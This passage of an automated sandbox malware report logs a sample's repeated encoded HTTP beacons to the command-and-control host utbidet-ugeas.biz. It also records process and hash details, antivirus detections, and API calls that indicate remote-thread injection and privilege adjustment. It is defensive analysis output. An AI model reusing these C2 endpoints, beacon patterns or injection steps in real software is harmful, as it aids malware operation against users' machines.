                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:35 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02CCF84FD9CCF84FD9FEF863D9CCF86D85D81C854BCCF879F7FED676EBFCC861D9
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    68192.168.2.1249857172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:36.227726936 CEST161OUTGET /d/N?028F582ECA8F582ECABD5802CA8F580C969BBCE4588F5818E4BD7617F8BF6800CA HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:36.709125996 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:36 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?028F582ECA8F582ECABD5802CA8F580C969BBCE4588F5818E4BD7617F8BF6800CA
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    69192.168.2.1249860172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:36.858918905 CEST161OUTGET /d/N?021463E02F1463E02F2663CC2F1463C27300872ABD1463D601264DD91D2453CE2F HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:37.344141960 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:37 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?021463E02F1463E02F2663CC2F1463C27300872ABD1463D601264DD91D2453CE2F
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    70192.168.2.1249862172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:37.753473043 CEST161OUTGET /d/N?028CF41BD68CF41BD6BEF437D68CF4398A9810D1448CF42DF8BEDA22E4BCC435D6 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:38.244913101 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:38 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?028CF41BD68CF41BD6BEF437D68CF4398A9810D1448CF42DF8BEDA22E4BCC435D6
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    71192.168.2.1249864172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:38.393143892 CEST161OUTGET /d/N?025A2E0A845A2E0A84682E26845A2E28D84ECAC0165A2E3CAA680033B66A1E2484 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:38.906603098 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:38 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?025A2E0A845A2E0A84682E26845A2E28D84ECAC0165A2E3CAA680033B66A1E2484
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    72192.168.2.1249866172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:39.182023048 CEST161OUTGET /d/N?02BE549BBBBE549BBB8C54B7BBBE54B9E7AAB05129BE54AD958C7AA2898E64B5BB HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:39.669457912 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:39 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02BE549BBBBE549BBB8C54B7BBBE54B9E7AAB05129BE54AD958C7AA2898E64B5BB
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    73192.168.2.1249868172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:40.102103949 CEST161OUTGET /d/N?02388B343B388B343B0A8B183B388B16672C6FFEA9388B02150AA50D0908BB1A3B HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:40.584737062 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:40 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02388B343B388B343B0A8B183B388B16672C6FFEA9388B02150AA50D0908BB1A3B
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    74192.168.2.1249870172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:41.498761892 CEST161OUTGET /d/N?024414EAFB4414EAFB7614C6FB4414C8A750F020694414DCD5763AD3C97424C4FB HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:41.999269962 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:41 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?024414EAFB4414EAFB7614C6FB4414C8A750F020694414DCD5763AD3C97424C4FB
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    75192.168.2.1249872172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:42.124849081 CEST161OUTGET /d/N?02087B1B75087B1B753A7B3775087B39291C9FD1E7087B2D5B3A552247384B3575 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:42.613513947 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:42 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02087B1B75087B1B753A7B3775087B39291C9FD1E7087B2D5B3A552247384B3575
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    76192.168.2.1249874172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:43.415121078 CEST161OUTGET /d/N?02B20A4AABB20A4AAB800A66ABB20A68F7A6EE8039B20A7C8580247399823A64AB HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:43.885535002 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:43 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02B20A4AABB20A4AAB800A66ABB20A68F7A6EE8039B20A7C8580247399823A64AB
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    77192.168.2.1249876172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:44.040165901 CEST161OUTGET /d/N?02F89C5C9AF89C5C9ACA9C709AF89C7EC6EC789608F89C6AB4CAB265A8C8AC729A HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:44.528086901 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:44 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02F89C5C9AF89C5C9ACA9C709AF89C7EC6EC789608F89C6AB4CAB265A8C8AC729A
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:09:33:50
                                                                                                                                                                    Start date:07/09/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\YsyrcskNFK.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\YsyrcskNFK.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:86'213 bytes
                                                                                                                                                                    MD5 hash:48916C39188D7A1ECD7618B9622D925C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:09:33:50
                                                                                                                                                                    Start date:07/09/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\system32\anfidear.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:86'213 bytes
                                                                                                                                                                    MD5 hash:48916C39188D7A1ECD7618B9622D925C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 87%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:09:33:50
                                                                                                                                                                    Start date:07/09/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:--k33p
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:86'213 bytes
                                                                                                                                                                    MD5 hash:48916C39188D7A1ECD7618B9622D925C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:09:33:50
                                                                                                                                                                    Start date:07/09/2024
                                                                                                                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:winlogon.exe
                                                                                                                                                                    Imagebase:0x7ff7e0d40000
                                                                                                                                                                    File size:906'240 bytes
                                                                                                                                                                    MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:09:33:50
                                                                                                                                                                    Start date:07/09/2024
                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                    Imagebase:0x7ff7d6c70000
                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Reset < >
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00403A27
                                                                                                                                                                      • GetVersionExA.KERNEL32(004120D0), ref: 00403A43
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00403A74
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407014), ref: 00403AA2
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403ACC
                                                                                                                                                                      • GetCommandLineA.KERNEL32(00000104), ref: 00403AD4
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403AF2
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00403B09
                                                                                                                                                                      • Process32First.KERNEL32(?,?), ref: 00403B32
                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00403B6A
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 00403B7B
                                                                                                                                                                      • Process32Next.KERNEL32(?,?), ref: 00403B94
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403BAC
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000FF), ref: 00403BB5
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403BC2
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403BE9
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00403BF6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateRemoteThread), ref: 00403C23
                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,00000104), ref: 00403C86
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtAllocateVirtualMemory), ref: 00403C96
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtWriteVirtualMemory), ref: 00403CA6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtShutdownSystem), ref: 00403CB6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 00403CC6
                                                                                                                                                                      • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,?,?,?,?,00000000,NtAllocateVirtualMemory), ref: 00403CE7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 00403D13
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryInformationToken), ref: 00403D2E
                                                                                                                                                                      • NtQueryInformationToken.NTDLL(?,00000002,00000000,00002000,?), ref: 00403D82
                                                                                                                                                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00002000,?), ref: 00403DEC
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00403E2B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004070C4), ref: 00403E50
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000104), ref: 00403E7F
